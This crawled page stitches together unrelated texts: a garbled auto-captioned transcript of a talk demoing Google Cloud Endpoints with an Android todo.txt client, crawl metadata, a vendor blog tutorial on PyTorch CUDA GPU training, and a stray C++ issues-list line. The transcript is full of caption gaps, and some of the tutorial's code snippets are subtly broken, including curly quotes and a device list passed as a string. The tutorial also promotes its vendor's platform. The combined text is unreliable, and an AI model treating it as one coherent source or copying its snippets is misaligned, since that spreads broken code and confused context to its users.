- 30:33
Give me one second.
- 30:34
Let's try that again.
- 30:43
So I've built my endpoint.
- 30:53
Maybe just rebuild and see if it works.
- 30:56
I'm getting an error somewhere.
- 31:05
[BLANK_AUDIO]
- 31:22
Sorry about this, just give me a second.
- 31:25
There's an error running, endpoint's client.
- 31:27
Hm.
- 31:29
Okay, I'll move on.
- 31:30
I'll demo that one a little bit later.
- 31:31
Let me just see what happened there Okay, so.
- 31:38
Threw me off a little bit.
- 31:40
Okay so, when I generate the endpoints for this first.
- 31:46
So what I've built with the cloud service, I'll try and get that running in a moment.
- 31:49
But before I build that, then I have client libraries
- 31:51
that are gonna access that, so let me build those guys.
- 31:54
So if I come in again here to Google Cloud Tools and
- 31:57
I say Generate Endpoint, I'm going to have some endpoints generated for me.
- 32:02
Now those endpoints are generated by a Google service.
- 32:04
It's gonna come in take a look at the code that I've written.
- 32:06
Take a look of how I've attributed them.
- 32:08
Build those classes for me and then store those classes in my Maven Repository.
- 32:12
I do have a backup project in case this one doesn't work.
- 32:15
And actually you know, I'm gonna go right to that one.
- 32:18
So.
- 32:20
[SOUND] This is the danger of
- 32:25
working with preview software
- 32:30
by the way, you see I'm in
- 32:35
preview 0.6 right now.
- 32:40
Okay, so I'll go back to my backend.
- 32:44
Let me run that.
- 32:45
[BLANK_AUDIO]
- 32:57
Okay.
- 32:58
There we go.
- 32:59
So, if you recall, I built the task API,
- 33:01
API and then I had the three methods within that.
- 33:03
Clear task, get tasks and store task.
- 33:06
So I just come in and execute this clear task.
- 33:08
Doesn't require anything to be done.
- 33:09
So, it doesn't require any parameters.
- 33:11
It's just gonna clear everything.
- 33:13
So if I, I have cleared them and if I
- 33:15
do get tasks, of course, it's gonna return something empty.
- 33:19
So now what happens if I try to store a task.
- 33:20
Now, if you remember, the task took an id and it took some data,
- 33:23
so I'm gonna go into the request body of the the call that I'm making
- 33:27
to it and I'm just gonna give this task an id of one and I'm
- 33:31
going to give it a data of, I don't know, hello room, hope this works.
- 33:38
And I'm gonna execute that.
- 33:39
So now, you can see that taskAPI.storetask executed and we
- 33:43
can see, there was no response coming back from this.
- 33:45
I didn't write it to have any acknowledge or anything
- 33:47
I like that but if I'd say, for example, if
- 33:49
I created another task and if I stored that task
- 33:53
and add a property and I am gonna say, id 2.
- 33:56
Say data second task, and I'm gonna
- 34:00
execute that, again that executes and now if
- 34:03
I go back and I take a look at my get tasks, and I just
- 34:06
execute the de, get tasks, we can see my response is coming back with the
- 34:09
JSON for all of my tasks, so that the two tasks that I had put in.
- 34:14
So that's how the API is actually running on the backend.
- 34:16
Of course it's still on my local host.
- 34:18
I'm gonna deploy it to the cloud in a few moments.
- 34:20
But before I do that, the first thing I would have to do
- 34:23
is to build the client libraries, so that my Android application can access them.
- 34:27
So let's take a quick look at that.
- 34:30
So before I ran this demo, I showed a demo.
- 34:33
Just the tooling, where I was up here
- 34:35
and I said tools, Google Cloud Tools, Generate Endpoint.
- 34:39
Now what that does is it that it builds those client libraries for me.
- 34:43
It draws them up and then it sticks them in my local Maven Repository.
- 34:46
So if I go take a look at my local Maven Repository, if I open my terminal.
- 34:53
Let me just open one with a bigger font.
- 34:59
Here we go.
- 35:00
So, I'm gonna go in my Maven Repositories and cd /user/ [UNKNOWN] /.m2/repository.
- 35:10
Okay.
- 35:11
Now, if you remember earlier on when I was
- 35:13
creating my backend, I had a namespace com.google.stuff so
- 35:18
I just gonna CD into that, com.google and what
- 35:23
was I calling it, I think it was tasks.
- 35:26
But a to do, backend or something.
- 35:29
Let me see.
- 35:31
Hm.
- 35:33
Sorry, just give me one second.
- 35:34
[SOUND] I'll go back to my code, I guess, and take a look.
- 35:41
It was oh, beg your pardon, it was com.todo txt wait, no, wrong one.
- 35:45
I'll look at my backend, and in my Java.
- 35:49
I had called the namespace com.google.todotxt.backend.
- 35:53
So I come back out here.
- 35:56
CD to do, oops, what
- 36:01
am I doing wrong?
- 36:02
CD com.
- 36:05
CD google.
- 36:11
Cd to do txt.
- 36:15
Cd backend.
- 36:16
There it is.
- 36:20
All right.
- 36:21
And if you remember when I when I created my API in attributed, I gave it the name.
- 36:26
I called it task API.
- 36:27
That's why we have a task API directory here.
- 36:30
And it's like CD into that.
- 36:31
Now I have these two things, these two things.
- 36:33
Maven metadata local, and is V1-1.18.0-RC.snapshot.
- 36:39
So that's the jarring up of my client files for me, the
- 36:42
tool that generated them, jarred them up and put it in that name.
- 36:45
So if I switch back to my Android studio, in my client's application.
- 36:51
Which was called to do txt.touch, if I look at itsfields.gradle.
- 36:58
So this is one that I had done earlier on, but the dependencies I've added here, you
- 37:02
see, I'm just gonna add to compilecom.google todotxt backend
- 37:06
task API V, one to one 18, RC snapshot.
- 37:09
It's a bit of a mouthful.
- 37:10
But that's just, I'm instructing Gradle to pull in those jar files.
- 37:14
From my local Maven Repository.
- 37:16
And I've also just specified within Gradle to say I wanna use maven local, so
- 37:20
pull in my local repositories so, this autogenerated
- 37:22
code is gonna get pulled into my application.
- 37:25
So now I've built my backend.
- 37:28
I've created an API in the backend, I've
- 37:30
created the client libraries for accessing that backend.
- 37:33
The last thing that I need to do, is
- 37:35
to build my client application to actually use these libraries.
- 37:39
So if you're familiar at all with the
- 37:41
Todo txt application, this will look pretty straightforward.
- 37:44
If not I'll just step through it.
- 37:47
So if I come into my source.
- 37:50
Within, I'm opening the todotxt touch.
- 37:53
Within my source, within the Java for this one, there's a set
- 37:58
of task libraries, and within these, there is what's a called a task by input.
- 38:04
So the author of todo txt, she created this task [UNKNOWN]
- 38:09
for managing tasks and for managing swapping them over and back.
- 38:12
Between Dropbox and the Android device itself.
- 38:16
And in this there were a couple of methods, that I
- 38:19
just wanna highlight, that were push to remote, here we go.
- 38:24
So, push to remote, remember Dropbox use this files, so, and
- 38:29
push to remote there's a local file repository for the text file.
- 38:33
And, all they wanna do when they push to remote is to
- 38:36
take it out of the local repository and push it to Dropbox.
- 38:39
Very straightforward.
- 38:40
And when they wanna pull from remote, that's a case of
- 38:42
pulling a file from Dropbox, and pushing it into the local repository.
- 38:46
And then read from that to be able to generate your to do list.
- 38:50
But of course, we're using a cloud backend now.
- 38:52
We're using the API that I had created earlier on.
- 38:55
So the nice thing I should do, the nice thing I can do
- 38:56
is I can just override this task bag impl with one of my own.
- 39:01
So I've created this one, that I call the End Points task bag impl.
- 39:05
So the cloud based backend with the API and the clients to access that.
- 39:09
I'm extending the original task [UNKNOWN] with this one.
- 39:14
And all this is gonna do, for push to remote and pull
- 39:16
from remote, is to use the API that I had just created.
- 39:19
So, let's take a quick look at that.
- 39:22
So first of all, you know, as I build my
- 39:24
task [UNKNOWN] class, I just, I created a task API builder.
- 39:29
From my backend that I had created and I actually have a live one running on the
- 39:34
internet right now so I could, I'll just use
- 39:37
the live one rather than using my local one.
- 39:39
And that's at [email protected].
- 39:43
So the same API with the three methods that I just showed you is running
- 39:47
there and I'm gonna create this [INAUDIBLE] called
- 39:50
task API service from the metadata in that.
- 39:52
And then I'm gonna use Task API service
- 39:55
with the push to remote and pull from remote.
- 39:58
So.
- 39:59
If you remember, when I went to pull from remote,
- 40:02
what I'm doing is I'm getting my full list of tasks.
- 40:05
So to get my full list of tasks what I've decided
- 40:07
to do is just, I'm gonna call the Clear Tasks APS.
- 40:11
I'm sorry, when I'm pushing to remote, I'm gonna
- 40:14
push everything for my client up to the Cloud.
- 40:16
So what I'm gonna do is clear all my tasks from the Cloud.
- 40:19
By just calling taskAPIservice.cleartasks, and then take a look
- 40:23
at the tasks that I have locally within my
- 40:25
UI, and then create beings for them, store and
- 40:28
call the store task for each one of those beings.
- 40:32
So again this is just my, just API calls now
- 40:34
on these class libraries which were auto generated for me.
- 40:37
And Ditto when I wanna pull from remote.
- 40:40
I'm just gonna go to the task API service, call
- 40:43
the get tasks on that, to get all of my tasks.
- 40:46
They were coming back as a list of task beans.
- 40:49
I used task beans also within my client application.
- 40:52
And now I can just render those tasks in my client application.
- 40:55
So for me it's change the back end from
- 40:57
Dropbox to the Cloud end points, I'm just using
- 41:00
my API, I'm extending the task [UNKNOWN] end pull
- 41:03
which was from Dropbox that is end points task
- 41:06
[UNKNOWN] so the last thing that I have to
- 41:08
do is just, replacing the code, where they were
- 41:11
using [UNKNOWN] with something they use as the end
- 41:14
points task [UNKNOWN] and I should be good to go.
- 41:18
So let's see what will happen if I try to run this.
- 41:20
Hopefully it'll work.
- 41:21
So I'm just gonna run the clients application, the Android App.
- 41:24
And I'm gonna run it in the emulator, and hopefully my emulator is behaving.
- 41:30
All right.
- 41:30
[SOUND] So I'll give that a moment to run.
- 41:34
It's gonna ask where do I want to run it?
- 41:36
I'm just saying I'm gonna run it in my emulator.
- 41:38
Takes a moment to compile it and then deploy it to the emulator.
- 41:41
[BLANK_AUDIO]
- 41:49
Here was one that I was doing earlier on, just
- 41:52
when I was doing a dry run to test this.
- 41:54
So, let's see if she's running yet.
- 41:59
All right, so let me see what'll happen when I try to end, add a task to this.
- 42:02
So, somebody give me some text, something rough.
- 42:05
Anything.
- 42:07
Who's gonna win England versus Uruguay?
- 42:09
I know we all wanna go watch that.
- 42:12
England?
- 42:12
Okay.
- 42:13
Predicted score.
- 42:16
Wow, okay.
- 42:17
One nothing.
- 42:18
[LAUGH] A year ago I, just put something like that out there.
- 42:21
I'm gonna Save that task.
- 42:23
So it's adding that task in the UI to my Android App.
- 42:26
It's a little slow cuz it's an emulator.
- 42:28
And now it's gone and stored that in the Cloud also.
- 42:31
So, if I go to my Cloud endpoint, so I called it LM Android test.
- 42:36
So this, when you build an application in
- 42:40
App Engine, every application has a product, project ID.
- 42:43
And that project ID is what prefixes before the appspot.com.
- 42:46
So you can see here, I called it LMAndroidTest.appspot.com.
- 42:51
So if I come in here and I take a look at the API explorer
- 42:54
for that one, we see we have the same task API, that had deployed it.
- 42:58
And if I do a get tasks and execute it,
- 43:02
it's going up to the Cloud, it's going up to App engine and we can
- 43:06
see here, the task that I just created was stored in the Cloud for me.
- 43:10
And also the way that the to do TXT works
- 43:13
is that, if you pick a task and you say that
- 43:14
task is done how it specifies that it's done is that
- 43:20
the way that to do TXT version of it was, they
- 43:21
just prefixed the task with a lower case x, and
- 43:25
so I haven't changed any of that code, so when it
- 43:26
would read it back, it would look for the lower case
- 43:28
x and you can actually see it there in the UI.
- 43:30
So I just said, hey look, this task is done and if I go back to my Cloud and I
- 43:35
do get tasks and execute it, I'm just doing the
- 43:38
same thing, I haven't overwritten any of their code for that.
- 43:40
And it just prefixed it with a lower case x
- 43:42
in the, the time and date for when it was done.
- 43:45
So that's all that it took so there was one
- 43:47
little but in my demo, sorry about that, but to
- 43:50
be able to build this out as to [UNKNOWN], to
- 43:52
build a back end that runs on an App Engine,
- 43:55
that exposes an API that generates a client class for
- 43:59
that API and then consume that client class within an
- 44:01
Android application, there's a lot of steps there but what
- 44:04
that gives you is that flexibility of being able to.
- 44:06
Build things for the backend, and say if I was now porting todo TXT, to
- 44:10
run on iOS, or to run as a web client, I now have the ability to
- 44:14
generate those client libraries with the APIs that
- 44:17
I can consume from within them, instead of
- 44:19
having code written within my App, Android application
- 44:22
that was tightly bound to a back end.
- 44:25
So just a quick look back at the architecture.
- 44:28
So this was everything that we build like in the last 20 minutes or so.
- 44:32
So that back ends, using the Cloud data store, Cloud end points wrapping that,
- 44:36
Cloud libraries that talk to them and
- 44:38
then the methods that, communicate between them.
- 44:41
[SOUND] Future directions, some of the things that we're
- 44:44
looking at with Android Studio and with Cloud Endpoints.
- 44:46
So GCE is Google Compute Engine which is
- 44:49
our infrastructure as a service offering, where you
- 44:52
can run VMs in the Cloud, similar to, you can emulate AWS or any of the other.
- 44:57
Cloud providers.
- 44:58
Um,a better API management console.
- 45:00
So you saw that the console that I was using there for testing the APIs.
- 45:04
It's a little primitive.
- 45:05
It's a little ugly.
- 45:06
The test harness isn't the greatest.
- 45:08
We are working on improving that.
- 45:10
Improving the getting started experience and just on
- 45:12
boarding, making the tools a little bit cleaner.
- 45:14
We have some releases coming next week with some great improvements in that.
- 45:18
We're also within the API management console looking
- 45:21
at, how do we incorporate third party APIs?
- 45:24
So the consule I was using there to test
- 45:26
my application was great, because I wrote that API myself.
- 45:29
But if I'm consuming somebody else's API I would
- 45:31
really like the consul to be able to do that.
- 45:33
So we're looking at integrating that as well.
- 45:35
And then also API analytics.
- 45:38
So there's some great stuff if you tune into.
- 45:41
All right, I know, if you're not going to Google IO next
- 45:43
week, the keynotes are gonna be online stream for free, I recommend you
- 45:47
tune in to the keynotes because, some of the API analytics stuff that
- 45:50
they're gonna be showing if take in a look and they're absolutely terrific.
- 45:53
And its just not analytics for the business perspective, to say how
- 45:56
many people from where are doing it, its deep analytics so you can
- 45:59
take a look at the perf of your application, where are the
- 46:02
bottlenecks, what's going wrong, how do you improve it that's kinds of thing.
- 46:04
And that some more details are coming next week.
- 46:08
And that's it.
- 46:09
That was a quick wrap up.
- 46:11
So thanks everybody for coming, and if anybody
- 46:13
has any questions, I'm happy to take them now.
- 46:15
At the back here.
- 46:17
>> Yeah,
- 46:20
can you go back to your [INAUDIBLE] your simulator?
- 46:27
>> Sure.
- 46:27
>> [INAUDIBLE] X marks the spot.
- 46:28
>> [LAUGH] L, lower case x?
- 46:29
>> Yeah.
- 46:30
>> Like this, that's a good question.
- 46:31
Let's see.
- 46:32
Yeah, [LAUGH] the [UNKNOWN] it is gone, yeah!
- 46:37
>> [UNKNOWN].
- 46:38
>> Yeah, we'll have to feed that back to
- 46:41
the author of todo.txt cuz that's how her one works.
- 46:43
So huh, interesting!
- 46:45
It should maybe, filter that out.
- 46:46
And I wonder what would it be, if I did a capital x?
- 46:49
It probably would be okay, right?
- 46:51
Oops.
- 46:53
So I say, x marks the spot.
- 46:59
Even that one fails.
- 47:00
[LAUGH] Any other questions?
- 47:03
Over here.
- 47:06
>> [INAUDIBLE] >> Sir, can we get a microphone?
- 47:12
Sorry [INAUDIBLE] >> Okay, so App Engine is not free.
- 47:22
So App Engine is a paid service.
- 47:24
You pay as you use it.
- 47:26
But the end point.
- 47:28
Is part of that cost, so there's
- 47:29
no additional cost for actually running an Endpoint.
- 47:32
So if you build an application ion Endpoint, you pay for, sorry.
- 47:35
Build an application in App Engine, you'll pay for the compute that you use
- 47:38
in running that application, like in the
- 47:40
One Direction, example that I used earlier on.
- 47:43
And, that's all that you will pay for.
- 47:44
You're not paying any additional for the end points on that.
- 47:47
And, actually for anybody, if one this is, if you want
- 47:50
to just drop me an e-mail sometime at that, I can get,
- 47:52
like, about $500 in free App Engine credits if anybody's interested in
- 47:56
it, just to kick their tires and building stuff on App Engine.
- 48:01
So.
- 48:02
Any other questions?
- 48:04
Eric.
- 48:04
>> [INAUDIBLE].
- 48:12
>> I believe some of that is actually next week,
- 48:16
preview next week, as far as I know I'm not too familiar with that one, but the,
- 48:21
the bundling up a whole bunch of things to
- 48:23
either launch or have in preview for Google IO.
- 48:25
And I think that's one of them.
- 48:30
Any others.
- 48:31
All good.
- 48:32
Okay, well thank you everybody, and enjoy the game.
- 48:35
[SOUND] | https://teamtreehouse.com/library/a-guide-to-simplicity-creating-web-backends-for-web-and-mobile-clients | CC-MAIN-2016-50 | refinedweb | 11,988 | 86.74 |
A step-by-step guide including a Notebook, code and examples
AI and Deep Learning (DL) have made a lot of technological advances over the last few years. The industry itself has grown rapidly, and has been proven to transform enterprises and daily life. There are many deep learning accelerators that have been built to make training more efficient. Today you’ll learn how to accelerate deep learning training using PyTorch with CUDA.
Why use GPU over CPU for Deep Learning?
There are two basic neural network training approaches. We might train either on a central processing unit (CPU) or graphics processing unit (GPU).
As you might know, the most computationally demanding piece in a neural network is multiple matrix multiplications. In general, if we start training on a CPU, each operation will be done one after the other. On the contrary, when using a GPU, all the operations will be done at the same time.
This is the main advantage of GPU over CPU. It is way faster. So, if you want to train a neural network please use GPU as it will spare you a lot of time and nerves.
How to maximize your GPUs using CUDA with PyTorch
This article is dedicated to using CUDA with PyTorch. I will try to provide a step-by-step comprehensive guide with some simple but valuable examples that will help you to tune in to the topic and start using your GPU at its full potential.
In this article we will talk about:
- What is PyTorch?
- Deep learning frameworks, Tensorflow, Keras, PyTorch, MxNet
- PyTorch CUDA Support
- CUDA, tensors, parallelization, asynchronous operations, synchronous operations, streams
- Using CUDA with Pytorch
- Availability and additional information about CUDA, working with multiple CUDA devices, training a PyTorch model on a GPU, parallelizing the training process, running a PyTorch model on GPU
- Best tools to manage PyTorch models
- Tensorboard, cnvrg.io, Azure Machine Learning
- Best practices, tips, and strategies
Let’s jump in.
What is PyTorch, and what makes it so popular?
To start with, let’s talk about deep learning frameworks. As you might know, there are many DL frameworks out there:
- TensorFlow (TF)
- Keras
- PyTorch
- MxNet
- And others
Each of these frameworks offers users the building blocks for designing, training, and validating deep neural networks through a high-level programming interface.
Every data scientist has their own favorite Deep Learning framework. PyTorch has become a very popular framework, and for good reason.
PyTorch is a Python open-source DL framework that has two key features. Firstly, it is really good at tensor computation that can be accelerated using GPUs. Secondly, PyTorch allows you to build deep neural networks on a tape-based autograd system and has a dynamic computation graph.
Moreover, PyTorch is a well-known, tested, and popular deep learning framework among data scientists. It is commonly used both in Kaggle competitions and by various data science teams across the globe.
To install PyTorch simply use a pip command or refer to the official installation documentation:
pip install torch torchvision
It is worth mentioning that PyTorch is probably one of the easiest DL frameworks to get started with and master. It provides awesome documentation that is well structured and full of valuable tutorials and simple examples. You should definitely check it out if you are interested in using PyTorch, or you are just getting started.
Furthermore, PyTorch includes an easy-to-use API that supports Python, C++, and Java. Also, PyTorch has no problems integrating with the Python data science stack which will help you unveil its true potential.
Overall, PyTorch is a really convenient to use tool with limitless potential. If you haven’t used it yet, you must try. I guarantee, it is worth it. Still, in this article the focus is on PyTorch and CUDA’s interaction, so, let’s proceed with a deep dive.
PyTorch CUDA Support
CUDA is a parallel computing platform and programming model developed by Nvidia that focuses on general computing on GPUs. CUDA speeds up various computations helping developers unlock the GPUs full potential.
CUDA is a really useful tool for data scientists. It is used to perform computationally intense operations, for example, matrix multiplications way faster by parallelizing tasks across GPU cores.
However, it is worth mentioning that CUDA is not the only tool for GPU computation acceleration. There is also OpenCL by Nvidia as well. Still, CUDA is simply more popular due to its high-level structure, so if you are not sure which tool to use you should probably start with CUDA.
As for PyTorch, it natively supports CUDA. CUDA can be accessed in the torch.cuda library.
As you might know neural networks work with tensors. Tensor is a multi-dimensional matrix containing elements of a single data type. In general, torch.cuda adds support for CUDA tensor types that implement the same function as CPU tensors but they utilize GPUs for computation. If you want to find you more about tensor types please refer to torch.Tensor documentation
Considering the key capabilities that PyTorch’s CUDA library brings, there are three topics that we need to discuss:
- Tensors
- Parallelization
- Streams
Tensors
As mentioned above, CUDA brings its own tensor types with it. The key feature is that the CUDA library is keeping track of which device GPU you are using.
CUDA automatically assigns any tensors that you create to the device that you are using (in most cases this device is GPUs). Moreover, after your tensor is assigned to a particular device you can perform any operation with it. These operations will be run on the device and the result will be assigned to the device as well.
This approach is really convenient as you may perform many operations at the same time by simply switching CUDA devices. Moreover, CUDA does not support cross-device computations. It means you will not mix and lose track of experiments due to any mistake if you spread your operations on different devices.
Parallelization
CUDA’s parallelization concept is based on asynchronous operations as all GPU operations are asynchronous by default. Such an approach helps to perform a larger number of computations in parallel.
For the user, this process is almost invisible. PyTorch does everything automatically by copying data required for computation to various devices and synchronizing them. Moreover, all operations are performed in the order of queuing as if every operation was executed synchronously.
Still, there is a major disadvantage. For example, if you face an error on a GPU it might be a tough challenge to identify the operation that caused the error. In such a case, it is better for you to use the synchronous approach. CUDA allows this as well.
By using synchronous execution you will see the errors when they occur and be able to identify and fix them. To use synchronous execution please refer to the official documentation considering this problem.
Streams
CUDA stream is a linear sequence of execution that is assigned to a specific device. In general, every device has its own default stream so you do not need to create a new one.
Operations are serialized in the order of creation inside each stream. However, operations from different streams can be executed at the same time in any relative order unless you are using any special synchronization methods.
It is worth mentioning that PyTorch automatically synchronizes data if you have your default stream set to some new stream. Still, it does not work with non-default streams. In such a case, it is your responsibility to ensure proper synchronization.
Using CUDA with PyTorch: a step-by-step example
Now you understand the basics of PyTorch, CUDA and their key capabilities. You also understand PyTorch CUDA support. Now let’s step away from the theory and discuss more practical applications of PyTorch and CUDA.. This section will cover how to use CUDA with PyTorch. I will try to be as precise as possible and try to cover every aspect you might need when working on your ML project.
What will be covered in this section:
- How to check the availability of CUDA?
- How to get additional information about the CUDA device?
- How to work on multiple CUDA devices?
- How to train a PyTorch model on a GPU?
- How to parallelize the training process?
- How to run a PyTorch model on a GPU?
Also, I have prepared a notebook that can be accessed via Google Collab to support this article. In this notebook, I am using MobileNet V3 architecture to solve a classification problem on the CIFAR10 dataset.
You will find everything mentioned in this article below in the notebook. Do not forget to turn on the GPU as the notebook will crash without it. Please feel free to experiment and play around as there is no better way to master something than practice.
Let’s jump in.
Check availability of CUDA
To start with, you must check if your system supports CUDA. You can do that by using a simple command.
torch.cuda.is_available()
This command will return you a bool value either True or False. So, if you get True then everything is okay and you can proceed, if you get False it means that something is wrong and your system does not support CUDA. Please make sure that you have your GPU turned on (in case you are using Google Collab) or go to the web to find out any other internal issues.
It is a crucial moment as this command will check if your GPU is available and the required NVIDIA drivers and CUDA libraries are properly installed. Please do not ignore this step as it might save you a lot of time and unnecessary frustrations.
Additional information about CUDA device
If you passed the previous step, it is time to figure out some useful information about the CUDA device you are currently on. The methods mentioned below are quite useful, so please keep them in mind when working with CUDA as they might help you figure out the problem if something goes wrong.It is worth mentioning, that the methods are available only on GPUs as that is exactly what CUDA works with.
Let’s start with simple information about the CUDA device like an id and name. There are simple methods for finding both of them.
torch.cuda.current_device() #returns you the ID of your current device torch.cuda.get_device_name(ID of the device) #returns you the name of the device
Also, you may find some useful information about the memory usage of the device.
torch.cuda.memory_allocated(ID of the device) #returns you the current GPU memory usage by tensors in bytes for a given device torch.cuda.memory_reserved(ID of the device) #returns you the current GPU memory managed by caching allocator in bytes for a given device, in previous PyTorch versions the command was torch.cuda.memory_cached
Moreover, you can actually release all unoccupied cached memory currently held by the caching allocator so that those can be used in other GPU applications using a simple method.
torch.cuda.empty_cache()
Still, you must remember that this command will not free the occupied GPU memory, so the amount of GPU memory available for PyTorch will not be increased. Just keep this in mind.
Working with multiple CUDA devices
All right, let’s assume that you have multiple devices that are CUDA compatible. Of course, you can use only one of them but, if you have the ability, you should probably use all of them. Firstly, using all of them will increase performance.. Secondly, CUDA allows you to do it quite seamlessly.
In general, there are two basic concepts that you might want to follow if you want to maximize the potential of multiple GPUs:
- Simply use each GPU (device) for its own purpose (task or application) – the basic but quite effective concept
- Use each GPU to do a part of a project – for example, in the ensemble case where you need to train a variety of models
Overall, the workflow is quite simple. Firstly, you need to figure out the ID of a specific CUDA device that you have using the methods mentioned above. Secondly, you just need to allocate tensors to a specific device or change the default device.
If you’re considering allocating tensors to various code devices, please keep in mind that in general, all tensors are allocated to your default (current) device that has ID equal to zero (0). Still, you can easily allocate a tensor to any CUDA device if you specify the ID of a destination device.
cuda1 = torch.device(‘cuda:1’) #where 1 is the ID of specific device tensor = torch.Tensor([0.,0.], device = cuda1) tensor = torch.Tensor([0.,0.]).to(cuda1) tensor = torch.Tensor([0.,0.]).cuda(cuda1)
As you may see there are three ways to allocate a PyTorch tensor to a specific device. Feel free to use any of them as all of them are legit. As mentioned above you cannot perform cross-GPU operations, so please use tensors from one device. Also, be aware that the tensor’s operation result will be allocated at the same device as the tensors.
Moving on to changing the default CUDA device. You can easily do this with a simple method.
torch.cuda.set_device(1) #where 1 is the ID of device
By doing that you will switch the default CUDA device and from that point, every tensor will be allocated on a new device.
Also, if you have multiple GPUs and for some reason do not want to use some of them you can make a specific GPU invisible using an environment variable.
import os os.environ[“CUDA_VISIBLE_DEVICES”] = “1,2,3” #where 1, 2, 3 are the IDs of CUDA devices that will be visible (in this example device with the 0 ID is invisible)
Training a PyTorch model on a GPU
Now that you know how to work with tensors and CUDA devices (GPUs), it is finally time to talk about training a PyTorch neural network on GPU. To tell the truth, it’s actually not so difficult. If you have checked the availability of the CUDA device, you will not face any problem in this step.
You might want to reference the “MobileNetV3 (small)” and “Training preparation” sections of the notebook I have prepared for you as it covers pretty much everything you need to know.
So, to train a PyTorch model on a GPU you need to:
- Code your own neural network architecture or use a pre-built one from torchvision.models
- Allocate your model to the GPU
net = MobileNetV3() #net is a variable containing our model net = net.cuda() #we allocate our model to GPU
3. Start training
Yes, it is that simple. Fortunately, PyTorch does not require anything complicated to carry out this task, unlike some other frameworks.
From now on your model will store on the GPU and the training process will be executed there as well. However, please do not forget that you must allocate your data on the GPU as well or you will face errors. You can do that as described in the “Working with multiple CUDA devices section”.
Still, if you want to make sure that your model is truly on the GPU you must check whether its parameters are on GPU or not.
next(net.parameters()).is_cuda #returns a bool value, True - your model is truly on GPU, False - it is not
If you are interested in the general training process for PyTorch models please refer to the “Training” section of my notebook as I have manually coded the training process there.
Parallelizing the training process
As for the parallelization, in PyTorch, it can be easily applied to your model using torch.nn.DataParallel.
The general idea is splitting the input across the specified CUDA devices by dividing the batch into several parts. In the forward pass, the model is replicated on each device, and each replica handles a portion of the input. During the backwards pass, gradients from each replica are summed into the original model.
Still, in terms of code, it is very simple. Below you can find a piece of code where I form a list of GPUs to make them CUDA visible devices, allocate my model to GPU and use DataParallel to make my training process parallelized.
GPU = 0, 1 gpu_list = '' multi_gpus = False if isinstance(GPU, int): gpu_list = str(GPU) else: multi_gpus = True for i, gpu_id in enumerate(GPU): gpu_list += str(gpu_id) if i != len(GPU) - 1: gpu_list += ',' os.environ['CUDA_VISIBLE_DEVICES'] = gpu_list net = net.cuda() if multi_gpus: net = DataParallel(net, device_ids = gpu_list)
Running a PyTorch model on GPU
So, after you finished training you might want to test your model on some test dataset. That is the point where you need to figure out how to run your model on a GPU.
Luckily we already know everything we need to do that. You can find a simple example of loading a PyTorch model from the checkpoint and allocating it to a CUDA device.
cuda = torch.cuda.is_available() net = MobileNetV3() checkpoint = torch.load(‘path/to/checkpoint/) net.load_state_dict(checkpoint[‘net_state_dict’]) if cuda: net = net.cuda() net.eval() result = net(image) #remember that image must be allocated to GPU as well
Best tools to manage PyTorch models
In the previous section, we have discussed how to use CUDA with PyTorch and now you should not face obstacles when using CUDA for your PyTorch project. Still, it is considered common sense to have a specific tool to back you up.
Sometimes when you dive into a project, you may quickly realize that you’re drowning in an ocean of Python scripts, data, algorithms, functions, updates, and so on. At some point, you just lose track of your experiments, and can’t even say which script or update led to the best result. That is why it is very convenient to have a tool that will help you with experiment tracking and model management.
There are many MLOps tools. There are even articles and lists that cover this topic. Still, I want to mention some of them here so you are able to feel the variety and decide if you need a tool at all.
I am sure you are all familiar with the first tool. It is Tensorboard.
In my experience it is the most popular tracking and visualization tool out there. It can be used with PyTorch but it has some pitfalls. For sure, it is an easy-to-start tool but its tracking functionality seems limited. There are tools that provide way more capabilities.
Still, it has nice and complete documentation, so you might give it a shot.
One way to make Tensorboard even easier to use is with cnvrg.io. cnvrg.io has Tensorboard embedded into the platform to help track and manage your projects without having to switch between platforms. In addition, cnvrg.io is natively integrated to PyTorch, that allows data scientists to easily parallelize computations across nodes. Not only that but cnvrg.io is natively integrated with Nvidia’s NGC containers so data scientists can instantly launch PyTorch in one click with optimized performance.
Overall, it is a very powerful tool with awesome and easy to navigate through documentation. Moreover, it has valuable tutorials for using PyTorch, so you should have no problem setting things up. Please refer to the official documentation if you want to learn more about the platform as there is too much to talk about.
That is why cnvrg is a good fit as the project management tool for any DL project.
The third tool I want to mention here is Azure Machine Learning. It is a cloud-based machine learning lifecycle platform developed by Microsoft.
To tell the truth, it is a really popular tool that is used by some large IT companies. It is really good at versioning and experiment tracking and has well-structured documentation with loads of simple examples.
However, due to its end-to-end focus and lack of valuable advanced tutorials the entry threshold is rather high. You really need to learn the tool before you will use it effectively. That is why please use Azure Machine Learning only if you are ready to spend some time studying the instrument.
Of course, it is impossible to cover all the variety of different MLOps tools. I have mentioned only those that I frequently use myself. So, please feel free to investigate the topic and you will eventually find the tool that suits you and your project the best
Best practices, tips, and strategies
Throughout this article I mentioned plenty of useful tips and techniques, so let’s summarize them into a list:
- Pick PyTorch as a DL framework if you want a tool that is effective, fast, and convenient to use
- Always train on GPUs
- If you are working in Kaggle kernels or Google Collab do not forget they support GPU usage but they are turned off by default. Please enable GPU accelerators there
- It is super easy and effective to use CUDA when working with a PyTorch model
- Do not forget about CUDA key capabilities such as tensors creation and usage, parallelizations, and streams
- Remember that it’s always good practice to keep track of GPU memory usage when using CUDA as it will help you avoid some unfortunate mistakes
- Do not forget to check PyTorch’s official documentation as it has plenty of simple examples and valuable tutorials that must cover the majority of your questions
- It’s recommended to use more than one GPU for better performance (if you have the option)
- Do not forget to parallelize the training process if possible
- Do not underestimate the power of community and forums. In many cases, if you face an error you can simply Google it and find the answer
- It is always better to use some MLOps tool to help you with model management, experiment tracking, resource management and DevOps automation
- You must keep an eye on PyTorch and CUDA updates as some things might change
Final Thoughts
Hopefully this tutorial will help you succeed and use your GPUs more effectively in your next Deep Learning project.
To summarize, we started with some theoretical information about using PyTorch and CUDA and went through a step-by-step guide on how to use CUDA when working on a PyTorch model. Also, we covered some PyTorch model management tools. Lastly, we talked about some tips you may find useful when working with CUDA.
If you enjoyed this post, a great next step would be to start building your own Deep Learning project with all the relevant tools. Check out tools like:
- PyTorch as a DL framework,
- CUDA as GPU accelerator,
- cnvrg for model management and experiment tracking
For extra support, you can access the Notebook for further code and documentation.
Thanks for reading, and happy training!
Resources
-
-
-
-
-
-
- | https://cnvrg.io/pytorch-cuda/ | CC-MAIN-2021-43 | refinedweb | 3,823 | 61.67 |
This page is a snapshot from the LWG issues list, see the Library Active Issues List for more information and the meaning of C++20 status.
